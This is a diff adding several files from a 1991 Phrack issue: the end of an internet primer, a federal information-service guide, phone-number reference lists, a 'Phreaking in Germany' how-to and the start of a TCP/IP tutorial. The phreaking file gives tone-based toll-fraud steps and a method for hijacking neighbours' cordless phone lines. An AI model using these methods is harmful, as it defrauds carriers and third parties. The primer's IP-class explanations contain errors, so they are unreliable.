+      |~~~~~~~~~~~~~~~|~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~|
+      |   rfc1011     |  Official Protocols of the Internet    |
+      |   rfc1009     |  NSFnet gateway specifications         |
+      |   rfc1001/2   |  netBIOS: networking for PC's          |
+      |   rfc894      |  IP on Ethernet                        |
+      |   rfc854/5    |  telnet - protocols for remote logins  |
+      |   rfc793      |  TCP                                   |
+      |   rfc792      |  ICMP                                  |
+      |   rfc791      |  IP                                    |
+      |   rfc768      |  UDP                                   |
+      |               |                                        |
+      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+
+10  Host Name and Address
+~~~~~~~~~~~~~~~~~~~~~~~~~
+     Internet addresses are long and difficult hard to remember (i.e.,
+128.128.57.83) so we use host names.  All hosts registered on the Internet
+must have names that reflect them domains under which they are registered.
+Such names are called Fully Qualified Domain Names (FQDNs).  Lets dissect a
+name and see the domains:
+
+ lilac.berkeley.edu
+   ^      ^      ^
+   |      |      |
+   |      |      |____  "edu" shows that this host is sponsored by an
+   |      |             education related organization.  This is a top-level
+   |      |             domain.
+   |      |
+   |      |___________  "berkeley" is the second-level domain.  This shows
+   |                    that it is an organization within University of
+   |                    Calironia at  Berkeley.
+   |
+   |__________________  "lilac" is the third-level domain.  This indicates the
+                        local host name is 'lilac'.
+
+     Common Top-Level Domains
+
+     COM  -  commercial enterprise
+     EDU  -  educational institutions
+     GOV  -  nonmilitary government agencies
+     MIL  -  military (non-classified)
+     NET  -  networking entities
+     ORG  -  nonprofit intuitions
+
+     A network address is the numerical address of a host, gateway, or TAC.
+The addresses are made up of four decimal numbered slots, which are separated
+by a period.
+
+     There are three classes that are used most, these are Class A, Class B,
+and Class C.
+
+   Class A  -  from '0'    to  '127'
+   Class B  -  from '128'  to  '191'
+   Class C  -  from '192'  to  '223'
+
+Class A  -  Is for MILNET net hosts.  The first part of the address has the
+            network number.  The second is for the physical PSN port number.
+            The third is for the logical port number, since it is on MILNET,
+            it is a MILNET host.  The fourth part is for which PSN it is on.
+            On 29.34.0.9.  '29' is the network it is on.  '34' means it is on
+            port '34'.  '9' is the PSN number.
+
+Class B  -  This is for the Internet hosts, the first two "clumps" are for the
+            network portion.  The second two are for the local port.
+
+             128.28.82.1
+               \_/   \_/
+                |     |_____ Local portion of the address
+                |
+                |___________ Potation address.
+
+Class C  -  The first three "clumps" are the network portion and the last one
+            is the local port.
+
+            193.43.91.1
+               \_|_/  |_____ Local Portation Address
+                 |
+                 |__________ Network Portation Address
+_______________________________________________________________________________
diff --git a/phrack33/4.txt b/phrack33/4.txt
new file mode 100644
index 0000000..66a2efc
--- /dev/null
+++ b/phrack33/4.txt
@@ -0,0 +1,217 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 4 of 13
+
+             ________________________________________________________
+            |                                                        |
+            |                          FEDIX                         |
+            |               On-Line Information Service              |
+            |                                                        |
+            |             Written by the people at FEDIX             |
+            |                                                        |
+            |                     Like Fedix Upix                    |
+            |________________________________________________________|
+
+
+What is FEDIX?
+
+FEDIX is an on-line information service that links the higher education
+community and the federal government to facilitate research, education, and
+services.  The system provides accurate and timely federal agency information
+to colleges, universities, and other research organizations.
+
+There are NO REGISTRATION FEES and NO ACCESS CHARGES for using FEDIX.  The
+only cost is for the phone call.
+
+FEDIX provides daily information updates on:
+
+  - Federal EDUCATION and RESEARCH PROGRAMS (including descriptions,
+    eligibility, funding, deadlines).
+  - SCHOLARSHIPS, FELLOWSHIPS, and GRANTS
+  - Available used government RESEARCH EQUIPMENT
+  - New funding for specific research and education activities from
+    the COMMERCE BUSINESS DAILY, FEDERAL REGISTER, and other sources.
+  - MINORITY ASSISTANCE research and education programs
+  - NEWS & CURRENT EVENTS within participating agencies
+  - GENERAL INFORMATION such as agency history, budget, organizational
+    structure, mission statement, etc.
+
+
+PARTICIPATING AGENCIES
+
+Currently FEDIX provides information on 7 federal agencies broken down into 2
+general categories:
+
+1. Comprehensive Education and Research Related Agency Information
+- The Department of Energy (DOE)
+- Office of Naval Research (ONR)
+- National Aeronautics and Space Administration (NASA)
+- Federal Aviation Administration (FAA)
+
+2. Minority Assistance Information
+- National Science Foundation (NSF)
+- Department of Housing and Urban Development (HUD)
+- Department of Commerce (DOC)
+
+Additional government agencies are expected to join FEDIX in the future.
+
+
+REQUIRED HARDWARE AND SOFTWARE
+
+Any microcomputer with communications software (or a dumb terminal) and a modem
+operating at 1200 or 2400 baud can access the system.
+
+
+HOURS OF OPERATION
+
+The system operates 24 hours a day, 7 days a week.  The only exceptions are for
+periodic system updating or maintenance.
+
+
+TELEPHONE NUMBERS
+
+* Computer (data line): 301-258-0953 or 1-800-232-4879
+* HELPLINE (technical assistance): 301-975-0103.
+
+The HELPLINE (for problems or comments) is open Monday-Friday 8:30 AM-4:30 PM
+Eastern Daylight Time, except on federal holidays.
+
+
+SYSTEM FEATURES
+
+Although FEDIX provides a broad range of features for searching, scanning, and
+downloading, the system is easy to use.  The following features will permit
+quick and easy access to agency databases:
+
+Menus
+-- Information in the system is organized under a series of branching menus.
+By selecting appropriate menu options (using either the OPTION NUMBER or the
+two-character MENU CODE), you may begin at the FEDIX Main Menu and work your
+way through various intermediate menus to a desired sub-menu.  However, if you
+already know the menu code of a desired menu, you may bypass the intermediate
+menus and proceed directly to that menu by typing the menu code at the prompt.
+
+Help screens are available for key menus and can be viewed by typing '?'
+at the prompt.
+
+Capturing Data
+-- If you are using a microcomputer with communicaions software, it is likely
+that your system is capable of storing or "capturing" information as it comes
+across your screen.  If you "turn capture on", you will be able to view
+information from the databases and store it in a file on your system to be
+printed later.  This may be desirable at times when downloading is not
+appropriate.  Refer to your communications software documentation for
+instructions on how to activate the capture feature.
+
+Downloading
+-- Throughout the system, options are available which allow you to search,
+list, and/or download files containing information on specific topics.  The
+download feature can be used to deliver text files (ASCII) or compressed,
+self-extracting ASCII files to your system very quickly for later use at your
+convenience.  Text files in ASCII format, tagged with a ".MAC" extension, are
+downloadable by Macintosh users.  Compressed ASCII files, tagged with an ".EXE"
+extension, may be downloaded by users of IBM compatible computers.  However,
+your system must be capable of file transfers.  (See the documentation on your
+communication software).
+
+Mail
+-- An electronic bulletin board feature allows you to send and receive messages
+to and from the SYSTEM OPERATOR ONLY.  This feature will NOT send messages
+between users.  It can be used to inquire about operating the system, receive
+helpful suggestions from the systems operator, etc.
+
+Utility Menu
+-- The Utility Menu, selected from the FEDIX Main Menu, enables you to modify
+user information, prioritize agencies for viewing, search and download agency
+information, set a default calling menu, and set the file transfer protocol for
+downloading files.
+
+
+INDEX OF KEY INFORMATION ON FEDIX
+
+Key information for each agency is listed below with the code for the menu from
+which the information can be accessed.  Please be advised that this list is not
+comprehensive and that a significant amount of information is available on
+FEDIX in addition to what is listed here.
+
+       AGENCY/DATABASE                                        MENU CODE
+
+DEPARTMENT OF ENERGY (DOE)/DOEINFO
+ Available Used Research Equipment                               :EG:
+ Research Program Information                                    :IX:
+ Education Program Information                                   :GA:
+ Search/List/Download Program Information                        :IX:
+ Research and Training Reactors Information                      :RT:
+ Procurement Notices                                             :MM:
+ Current Events                                                  :DN:
+
+
+NATIONAL AERONAUTICS AND SPACE ADMINISTRATION/NASINFO
+ Research Program Information                                    :RP:
+ Education Program Information                                   :EA:
+ Search/List/Download Program Information                        :NN:
+ Description/Activities of Space Centers                         :SC:
+ Procurement Notices                                             :EV:
+ Proposal/Award Guidelines                                       :NA:
+
+
+OFFICE OF NAVAL RESEARCH/ONRINFO
+ Research Program Information                                    :RY:,:AR:
+ Special Programs (Special Research and Education Initiatives)   :ON:
+ Search/List/Download Program Information                        :NR:
+ Description/Activities of Laboratories and other ONR Facilities :LB:
+ Procurement Notices (Broad Agency Announcements, Requests for    --
+    Proposals, etc.                                              :NE:
+ Information on the Preparation and Administration of Contracts,  --
+    Grants, Proposals                                            :AD:
+
+
+FEDERAL AVIATION ADMINISTRATION/FAAINFO
+ Education Program Information - Pre-College                     :FE:
+ Mio rity Aviation Education Programs                            :FY:
+ Search/List/Download Program Information                        :FF:
+ Aviation Education Resources (Newsletters, Films/Videos,         --
+     Publications)                                               :FR:
+ Aviation Education Contacts (Government, Industry, Academic,     --
+     Associations)                                               :FO:
+ College-Level Airway Science Curriculum Information             :FC:
+ Procurement Notice                                              :FP:
+ Planned Competitive and Noncompetitive Procurements for the      --
+     Current Fiscal Year                                         :F1:
+ Employment Information                                          :FN:
+ Current Events                                                  :FV:
+
+
+MINORITY/MININFO
+ U. S. Department of Commerce
+  Research/Education Minority Assistance Programs                :CP:
+  Procurement Notices (ALL Notices for Agency)                   :M1:
+  Current Events                                                 :M1:
+  Minority Contacts                                              :M1:
+
+ Department of Energy
+  Research/Education Minority Assistance Programs                :EP:
+  Procurement Notices (ALL Notices for Agency)                   :M2:
+  Current Events                                                 :M2:
+  Minority Contacts                                              :M2:
+
+ U.S. Department of Housing and Urban Development
+  Research/Education Minority Assistance Programs                :HP:
+  Procurement Notices (ALL Notices for Agency)                   :M3:
+  Current Events                                                 :M3:
+  Minority Contacts                                              :M3:
+
+ National Aeronautics and Space Administration
+  Research/Education Minority Assistance Programs                :NP:
+  Procurement Notices (ALL Notices for Agency)                   :M4:
+  Current Events                                                 :M4:
+  Minority Contacts                                              :M4:
+
+ National Science Foundation
+  Research/Education Minority AssisdaXce Programs                :SP:
+  Procurement Notices (ALL Notices for Agency)                   :M5:
+  Budget Information                                             :SB:
+  NSF Bulletin                                                   :M5:
+  Minority Contacts                                              :M5:
+
+_______________________________________________________________________________
diff --git a/phrack33/5.txt b/phrack33/5.txt
new file mode 100644
index 0000000..91c5805
--- /dev/null
+++ b/phrack33/5.txt
@@ -0,0 +1,216 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 5 of 13
+
+
+                          |\/\/\/\/\/\/\/\/\/\/\/\/\/|
+                          |                          |
+                          |    LATA Referance List   |
+                          |                          |
+                          |     by Infinite Loop     |
+                          |                          |
+                          |/\/\/\/\/\/\/\/\/\/\/\/\/\|
+
+
+          United States telephone LATA official designation numbers:
+
+          STATE  NAME                  NUMBER
+
+          AK     ALASKA                832
+          AL     BIRMINGHAM            476
+          AL     HUNTSVILLE            477
+          AL     MONTGOMERY            478
+          AL     MOBILE                480
+          AR     FORT SMITH            526
+          AR     LITTLE ROCK           528
+          AR     PINE BLUFF            530
+          AZ     PHOENIX               666
+          AZ     TUCSON                668
+          AZ     NAVAJO RESERVATION    980
+          CA     SAN FRANCISCO         722
+          CA     CHICO                 724
+          CA     SACRAMENTO            726
+          CA     FRESNO                728
+          CA     LOS ANGELES           730
+          CA     SAN DIEGO             732
+          CA     BAKERSFIELD           734
+          CA     MONTEREY              736
+          CA     STOCKTON              738
+          CA     SAN LUIS OBISPO       740
+          CA     PALM SPRINGS          973
+          CO     DENVER                656
+          CO     COLORADO SRPINGS      658
+          CT     CONNECTICUT <SNET>    920
+          DC     WASHINGTON            236
+          FL     PENSACOLA             448
+          FL     PANAMA CITY           450
+          FL     JACKSONVILLE          452
+          FL     GAINESVILLE           454
+          FL     DAYTONA BEACH         456
+          FL     ORLANDO               458
+          FL     SOUTHEAST             460
+          FL     FORT MYERS            939
+          FL     GULF COST             952
+          FL     TALLAHASSEE           953
+          GA     ATLANTA               438
+          GA     SAVANNAH              440
+          GA     AUGUSTA               442
+          GA     ALBANY                444
+          GA     MACON                 446
+          HI     HAWAII                834
+          IA     SIOUX CITY            630
+          IA     DES MOINES            632
+          IA     DAVENPORT             634
+          IA     CEDAR RAPIDS          635
+          ID     IDAHO                 652
+          ID     COEUR D'ALENE         960
+          IL     CHICAGO               358
+          IL     ROCKFORD              360
+          IL     CAIRO                 362
+          IL     STERLING              364
+          IL     FORREST               366
+          IL     PEORIA                368
+          IL     CHAMPAIGN             370
+          IL     SPRINGFIELD           372
+          IL     QUINCY                374
+          IL     MATTOON               976
+          IL     GALESBURG             977
+          IL     OLNEY                 978
+          IN     EVANSVILLE            330
+          IN     SOUTH BEND            332
+          IN     AUBURN/HUNTINGTON     334
+          IN     INDIANAPOLIS          336
+          IN     BLOOMINGTON           338
+          IN     RICHMOND              937
+          IN     TERRE HAUTE           938
+          KS     WICHITA               532
+          KS     TOPEKA                534
+          KY     LOUISVILLE            462
+          KY     OWENSBORO             464
+          KY     WINCHESTER            466
+          LA     SHREVEPORT            486
+          LA     LAFAYETTE             488
+          LA     NEW ORLEANS           490
+          LA     BATON ROUGE           492
+          MA     WESTERN MASSACHUSETT  126
+          MA     EASTERN MASSACHUSETT  128
+          MD     BALTIMORE             238
+          MD     HAGERSTOWN            240
+          MD     SALISBURY             242
+          ME     MAINE                 120
+          MI     DETROIT               340
+          MI     UPPER PENINSULA       342
+          MI     SAGINAW               344
+          MI     LANSING               346
+          MI     GRAND RAPIDS          348
+          MN     ROCHESTER             620
+          MN     DULUTH                624
+          MN     ST CLOUD              626
+          MN     MINNEAPOLIS           628
+          MO     ST LOUIS              520
+          MO     WESTPHALIA            521
+          MO     SPRINGFIELD           522
+          MO     KANSAS CITY           524
+          MS     JACKSON               482
+          MS     BILOXI                484
+          MT     GREAT FALLS           648
+          MT     BILLINGS              650
+          MT     KALISPELL             963
+          NC     ASHEVILLE             420
+          NC     CHARLOTTE             422
+          NC     GREENSBORO            424
+          NC     RALEIGH               426
+          NC     WILMINGTON            428
+          NC     FAYETTEVILLE          949
+          NC     ROCKY MOUNT           951
+          ND     FARGO                 636
+          ND     BISMARCK              638
+          NE     OMAHA                 644
+          NE     GRAND ISLAND          646
+          NE     LINCOLN               958
+          NH     NEW HAMPSHIRE         122
+          NJ     ATLANTIC COSTAL       220
+          NJ     DELAWARE VALLEY       222
+          NJ     NORTH JERSEY          224
+          NM     NEW MEXICO            664
+          NV     RENO                  720
+          NV     PAHRUMP               721
+          NY     NEW YORK METRO        132
+          NY     POUGHKEEPSIE          133
+          NY     ALBANY                134
+          NY     SYRACUSE              136
+          NY     BINGHAMTON            138
+          NY     BUFFALO               140
+          NY     FISHERS ISLAND        921
+          NY     ROCHESTER             974
+          OH     CLEAVELAND            320
+          OH     YOUNGSTOWN            322
+          OH     COLUMBUS              324
+          OH     AKRON                 325
+          OH     TOLEDO                326
+          OH     DAYTON                328
+          OH     CINCINNATI BELL       922
+          OH     MANSFIELD             923
+          OK     OKLAHOMA CITY         536
+          OK     TULSA                 538
+          OR     EUGENE                670
+          OR     PORTLAND              672
+          PA     CAPITAL               226
+          PA     PHILADELPHIA          228
+          PA     ALTOONA               230
+          PA     NORTHEAST             232
+          PA     PITTSBURG             234
+          PA     ERIE                  924
+          PR     PUERTO RICO           820
+          RI     RHODE ISLAND          130
+          SC     GREENVILLE            430
+          SC     FLORENCE              432
+          SC     COLUMBIA              434
+          SC     CHARLESTON            436
+          SD     SOUTH DAKOTA          640
+          TN     MEMPHIS               468
+          TN     NASHVILLE             470
+          TN     CHATTANOOGA           472
+          TN     KNOXVILLE             474
+          TN     BRISTOL               956
+          TX     EL PASO               540
+          TX     MIDLAND               542
+          TX     LUBBOCK               544
+          TX     AMARILLO              546
+          TX     WICHITA FALLS         548
+          TX     ABILENE               550
+          TX     DALLAS                552
+          TX     LONGVIEW              554
+          TX     WACO                  556
+          TX     AUSTIN                558
+          TX     HOUSTON               560
+          TX     BEAUMONT              562
+          TX     CORPUS CHRISTI        564
+          TX     SAN ANTONIO           566
+          TX     BROWNSVILLE           568
+          TX     HEARNE                570
+          TX     SAN ANGELO            961
+          US     MIDWAY/WAKE           836
+          UT     UTAH                  660
+          UT     NAVAJO RESERVATION    981
+          VA     ROANOKE               244
+          VA     CULPEPER              246
+          VA     RICHMOND              248
+          VA     LYNCHBURG             250
+          VA     NORFOLK               252
+          VA     HARRISONBURG          927
+          VA     CHARLOTTESVILLE       928
+          VA     EDINBURG              929
+          VI     US VIRGIN ISLANDS     822
+          VT     VERMONT               124
+          WA     SEATTLE               674
+          WA     SPOKANE               676
+          WI     NORTHEASST            350
+          WI     NORTHWEST             352
+          WI     SOUTHWEST             354
+          WI     SOUTHEAST             356
+          WV     CHARLESTON            254
+          WV     CLARKSBURG            256
+          WV     BLUEFIELD             932
+          WY     WYOMING               654
+_______________________________________________________________________________
diff --git a/phrack33/6.txt b/phrack33/6.txt
new file mode 100644
index 0000000..711b731
--- /dev/null
+++ b/phrack33/6.txt
@@ -0,0 +1,328 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 6 of 13
+
+                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                   -                                         -
+                   =  International Toll-free, Local Rated,  =
+                   -                                         -
+                   =       and Specially Toll Services       =
+                   -                                         -
+                   =         by The Trunk Terminator         =
+                   -                                         -
+                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+The following indicates access codes and numbers used within various countries
+for toll-free and special paid services.  The dialing codes shown represent how
+they would be dialed within the country involved.  Generally, it is not
+possible to access another country's domestic toll-free or specialty network
+directly.  Where an international access is available, it is normally done by
+using the domestic services which then forward the call to the destination
+country.
+
+Where possible, the number of digits has been indicated with 'n' (a number from
+2 to 8) or 'x' (any number). An ellipsis (...) indicates that there are a
+variable number of extra digits, or possibly a conflict in the reports of
+numbers of digits used.
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                  Toll-free or equivalent local charge services
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+=================
+A u s t r a l i a
+=================
+
+008 xxx xxx       That is how Phrack Inc. recomends it be written
+                  to differentiate it from STD area codes
+                  which are written with area codes (0x) thru
+                  (0xxx) and numbers n xxxx through nxx xxxx.
+
+0014 ttt xxx xxx  International Toll free access from Australia
+                  (ttt is reported as "800" or other toll-free
+                  access code; or, ttt may not be present at all.
+
+                  (Canada Direct uses 0014 881 150)
+
+=============
+B e l g i u m
+=============
+
+11 xxxx
+
+=============
+D e n m a r k
+=============
+
+800 xxxxx
+8001 xxxx         (charged as local call)
+
+=============
+F i n l a n d
+=============
+
+9800 xxxxx (...)  (PTT as local service provider)
+0800 xxxxx (...)  (Private phone company as local service provider)
+
+                  9800 costs the same as a local call (dialable from
+                  all areas in Finland), while 0800 are truly toll-free and
+                  dialable from all private telco areas.
+
+===========
+F r a n c e
+===========
+
+05 xxxxxx         This is outside area code 1, so from Paris 16 05.
+
+05 19 xx xx       These numbers terminate outside France.
+
+36 63 xx xx       (local call rate)
+
+                  '11' is computer directory information.
+                  '12' is voice directory information (equivalent to 411).
+
+===========================
+G e r m a n y   ( w e s t )
+===========================
+
+0130 xxxx (...xx) The number to use AT&T is 0130-0010 and U.S. Sprint is
+                  0130-0013. For a general toll-free number listings, pick up
+                  a copy of the International Herald newspaper and look in the
+                  sports section is for an AT&T add. You will find a number
+                  for dialing the US from various countries. Mearly, chop
+                  off the exchange and only use the "area code" number.
+
+=============
+I r e l a n d
+=============
+
+1800 xxxxxx
+1850 xxxxxx       (local rate)
+
+=========
+I t a l y
+=========
+
+167 xxxxx         (digits length)
+
+                  We're not 100% sure about the length of digits for Italy.
+                  One way to check these is to get a copy of an *international*
+                  edition of the weekly magazines like TIME, all ads and little
+                  contents. But they do goof up regularly, like printing Paris
+                  numbers as (01) xxxxxxxx when they mean (1) xxxxxxxx.
+
+===========
+M e x i c o
+===========
+
+91 800 xxxxx....
+
+=====================
+N e t h e r l a n d s
+=====================
+
+06-0xxx
+06-0xxxxxx
+06-4xx(x)         06-2229111 is AT&T USA direct and Sprint & MCI have operator
+                  services on 06-022xxxx.  It used to be possible to call
+                  06-022xxxx to Denmark, and then use the CCITT no. 4
+                  signalling system to phreak calls to anywhere in the
+                  world.
+
+                  06-11 This is the Dutch equivalent of 911, it is free when
+                  dialled from a phone company operated payphone, otherwise the
+                  charge is one unit, DFL 0.15, about US $ 0.08.  There were
+                  discussions about making such calls free from any phone, but
+                  I haven't followed them recently.  Calling a toll-free number
+                  from a payphone requires a deposit of one coin, which is
+                  returned after the call.
+
+                  The total length of the numbers varies from 4 to 10 digits
+                  and the dash indicates the secondary dial tone.  It is not
+                  possible to reach 06 prefixed numbers from abroad.
+
+=====================
+N e w   Z e a l a n d
+=====================
+
+0800 xxx xxx      That is through the state telco, Telecom New Zealand. Clear
+                  Communications, the recently started alternative LD carrier,
+                  does not offer a toll-free service as yet.  When Clear offer
+                  one, it will more than likely be to the subscribers existing
+                  number (eg Dial toll free 050-04-654-3210) as they are not
+                  in control of number issue. 0800 is strictly Telecom at this
+                  stage.
+
+=========================
+N o r t h   A m e r i c a
+=========================
+
+1 800 nxx xxxx    Access to toll free numbers can vary according
+                  to region, state or country (ie. not all 800
+                  numbers are accessible to all regions).
+
+                  The nxx prefix portion of the 800 number presently
+                  determines which long distance carrier or 800
+                  service company will handle the call (and in
+                  some cases determine the geographical region).
+
+=========
+S p a i n
+=========
+
+900 xxxxxx        The number for ATT direct in Spain is 900-99-00-11.  The
+                  payphones are all push-button but generate pulses.  It takes
+                  forever to get connected.
+
+===========
+S w e d e n
+===========
+
+020 xxxxxx        (without dialtone after '020').
+
+=====================
+S w i t z e r l a n d
+=====================
+
+04605 xxxx        (not toll-free but metered at lowest rate)
+155 xx xx         ("green number")
+
+                  In Switzerland there is nothing exactly like the equivalent
+                  to United States "800" service.  The PTT is now encouraging
+                  the use of "green numbers" beginning with 155.  The direct
+                  marketing ads on TV often give the order number for
+                  Switzerland as a number such as 155 XX XX.  The access number
+                  for MCI Call USA is for example 155 02 22.  There are two
+                  problems with this:
+
+                  1] When calling from a model AZ44(older model) payphone all
+                  numbers which begin with a "1" are treated as "service"
+                  numbers and the payphone begins to sound a "cuckoo clock
+                  noise" once the 155 is entered.  The "cuckoo clock noise" is
+                  to alert operators on the "service numbers" that the caller
+                  is using a payphone (fraud protection).  This noise is quite
+                  a distraction when calling someone in the USA using MCI Call
+                  USA.
+
+                  2] The newer style TelcaStar phones are programmed to block
+                  the keypad after 3 digits are dialed of a "service number".
+                  It used to be that the only numbers beginning with "1" were
+                  "service numbers" and all "service numbers" were 3 digits.
+                  The PTT is aware of this problem and are said to be
+                  considering what instructions to give the manufacturer of the
+                  payphones.
+
+                  AT&T USA Direct has an access number of 046 05 00 11.  This
+                  is not a free call, but the time is metered at the lowest
+                  rate.  This number does not suffer the "cuckoo clock noise"
+                  problem.
+
+                  Canada Direct uses 046 05 83 30.
+
+===========================
+U n i t e d   K i n g d o m
+===========================
+
+0800 xxx xxx      (Toll-free)
+0345 xxx xxx      (Local rate)
+
+
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                       Tolled/Specialty Pay services
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+=================
+A u s t r a l i a
+=================
+
+0055 x yxxx       where y=0-4,8 means the number is Australia
+                                wide (and costs more),
+                        y=5     means the number is only state wide,
+                        y=6,7,9 means the number is for the
+                                capital city only.
+
+=============
+F i n l a n d
+=============
+
+9700 xxxxx        (PTT-operated)
+0700 xxxxx        (Private telco-operated)
+
+                  The cost ranges from about 0.5 USD to 5 USD per minute.
+
+===========
+F r a n c e
+===========
+
+36 65 xx xx       (5 message units each call for up to 140 seconds)
+
+                  These are for various information services as well as chat
+                  lines.
+
+=====================
+N e t h e r l a n d s
+=====================
+
+06-9 xx...
+06-321 xx...
+06-8 xx...        (3 to 40ct/min)
+
+                  Other codes (such as 06-9) precede special tariff calls
+                  (similar to 900 in the US).  The highest special rate is
+                  (currently) DFL 0.50 / minute.
+
+=========================
+N o r t h   A m e r i c a
+=========================
+
+1 900 nxx xxxx    (various rates, depending on provider)
+1 (npa) 976 xxxx  (in many area codes, connected through regional telco;
+                   in some areas, the call requires the area code where
+                   depending on the intra-area dialing used)
+
+                  (other exchange prefixes within area codes such as 540, 720
+                  or 915 are used for other pay services such as group chat,
+                  other types of recorded messages, etc.  These vary depending
+                  on the area code within North America, and not all regions in
+                  North America have these.)
+
+===========
+S w e d e n
+===========
+
+071 x xxxxx
+
+                  The Swedish answer to the United States "900"-number, 071 are
+                  as follows.
+
+                  (Charges are related to the next digit)
+
+code       SEK/minute
+0712xxxxx     3,65
+0713xxxxx     4,90
+0714xxxxx     6,90
+0715xxxxx     9,90
+0716xxxxx    12,50
+0717xxxxx    15,30
+0719xx       varying fees, cannot be dialled directly but needs operator
+
+                  Numbers starting with 0713-0717 can only be dialled from
+                  phones connected to AXE exchanges.  At present about half of
+                  all phones in Sweden are connected to such exchanges.
+
+                  Another special toll number is domestic number information:
+                  07975 (6,90 SEK/minute).
+
+===========================
+U n i t e d   K i n g d o m
+===========================
+
+0836 xxx xxx
+0898 xxx xxx
+
+                  The rate seems to be uniform as 34p per minute cheap rate,
+                  45p at all other times.
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
diff --git a/phrack33/7.txt b/phrack33/7.txt
new file mode 100644
index 0000000..680e369
--- /dev/null
+++ b/phrack33/7.txt
@@ -0,0 +1,119 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 7 of 13
+
+                           //---------------------\\
+                          ||   P h r e a k i n g   ||
+                          ||                       ||
+                          ||          i n          ||
+                          ||                       ||
+                          ||     G e r m a n y     ||
+                          ||                       ||
+                          ||           by          ||
+                          ||                       ||
+                          ||   -=+Ninja Master+=-  ||
+                          ||                       ||
+                          ||           of          ||
+                          ||                       ||
+                          || -[The Hellfire Club]- ||
+                           \\---------------------//
+
+
+Phreaking in Germany at this moment is at an all time high.  The main reason is
+because of the German reunification.  Most, if not all, of the equipment in
+Germany is still mechanical (especially on the former Communist side).  So
+Boxing is VERY easy to do, as are line taps.
+
+Tracing on the other hand, is still hard to do.  This is because with the
+mechanical switches they need many technicians who look at the switches and
+follow the wires on their own.  They usually don't know where the wire leads,
+so they have to physically follow the wire to trace it.
+
+There are two main ways of phreaking in Germany at the moment.  One is Boxing
+and the other is through Cordless Phones, both of which I will describe.
+
+ //------\\
+|| Boxing ||
+ \\------//
+
+Boxing in Germany is somewhat similar to the US, but I will describe to you
+the whole process.
+
+Most boxing in Germany is started with a call to a toll free number (most of
+which produce a connection to a firm in the US, AT&T.) To initiate the call,
+you dial 0130 - 81 and the number.  Germany's toll free net starts with 0130.
+81 is for connection to the US. You wait for the connection, and blast the
+dissconect signal.  As we all know, in the US it's 2600 Hz, but in Germany it's
+a mixture of 2400 and 2600 Hz.  After that, you send a single 2400 Hz frequency
+to hold the line.  Then you decide if you want a local US call, or an
+International call. Don't forget, you are connected to the US now, so it looks
+as if anything out of it as International, even though your calling from
+Germany.  Calls within the US are done normally, with KP+0+AC+NNNNNNN.
+To make the international call, it's KP2+internalional code+0+number.
+You have to drop the zero though from the number you care calling.  For
+example, in Germany all numbers start with a 02366.
+
+One big difference between boxing in the US and Germany, are the laws.  In
+Germany, they look very strictly at data-security, but the laws are not clear
+in
+ the area of phreaking. No one knows if a phreak is really stealin something
+from the German phone company, since he is using a normal phone number. This
+may sound stupid to us, but that's how they view it.  Phreaks getting busted
+for in Germany is usually a rare occassion, if ever.
+
+ //---------------\\
+|| Cordless Phones ||
+ \\---------------//
+
+When I am refering to "cordless phones", I'm not talking about portable phones
+in the cellular phone system.  I'm talking about simple cordless phones that
+you have in your home.  Cordless phones broadcast on a speciffic radio
+frequency (around 46MHz) to a "base unit" that is connected to the wall jack.
+
+What the you do now is put a long antenna on the roof of your car. Then
+connect the antenna to your handset.  The length of the antenna is usually
+best around 1.5 meters long.  You only need the handset, because you are going
+to be connecting to another persons base, but make sure the batteries in the
+handset are fully charged.  Now, the next step is to drive around in your car,
+until you hear a free line.  Then, mearly call anywhere you like!  Usually you
+have to situate yourself, and find where the best postion is to recieve the
+signal clearly, and that the person who's base your connected to can't see you.
+
+One reason this works quite well, is because most cordless phones in Germany
+don't have the code feature that is so prominent here (where you can
+select a scrambling code on the handset and base).
+
+One of the incentives to phreak in this manner is because, cordless phones
+being illegal, the person, who's dial tone you used, would much rather pay a
+few high long distance bills than the even higher fines for geting caught with
+a cordless phone.
+
+Cordless phones are forbidden in Germany, although you can buy them almost
+anywhere.  What is illegal is to physically connect them to the phone
+system.  The phone company there actually searches for people with cordless
+phones, by using a specially equiped van.  Once they find that you have a
+cordless phone connected, they come with two policmen and a search warrant.
+You can be charged with anything from illegal connection of nontested equipment
+to forging of a document.
+
+ //----------\\
+|| Conclusion ||
+ \\----------//
+
+Well, I hope this gave you a little bit of understanding of how disorganized
+the phone system is in over there, and gave you a few helpfull hints in case
+you ever happen to find yourself in Germany.
+
+If you have any comments, corrections, or additions, you can reach me through
+Phrack, or the following boards:
+
+          Lightning  Systems                      9th  Dimension
+             414-363-4282                          818-783-5320
+
+Until next time!
+
+            -=+Ninja Master+=-
+           -[The Hellfire Club]-
+"Tell Telco We're Phreaking, Phreaking USA!"
+
+\\---------------------------------------------------------------------------//
diff --git a/phrack33/8.txt b/phrack33/8.txt
new file mode 100644
index 0000000..e48c6a1
--- /dev/null
+++ b/phrack33/8.txt
@@ -0,0 +1,524 @@
+                                ==Phrack Inc.==
+
+                Volume Three, Issue Thirty-Three, File 8 of 13
+
+                    A TCP/IP Tutorial : Behind The Internet
+                                Part One of Two
+
+                              September 12, 1991
+
+                                  by The Not
+
+
+Table of Contents
+
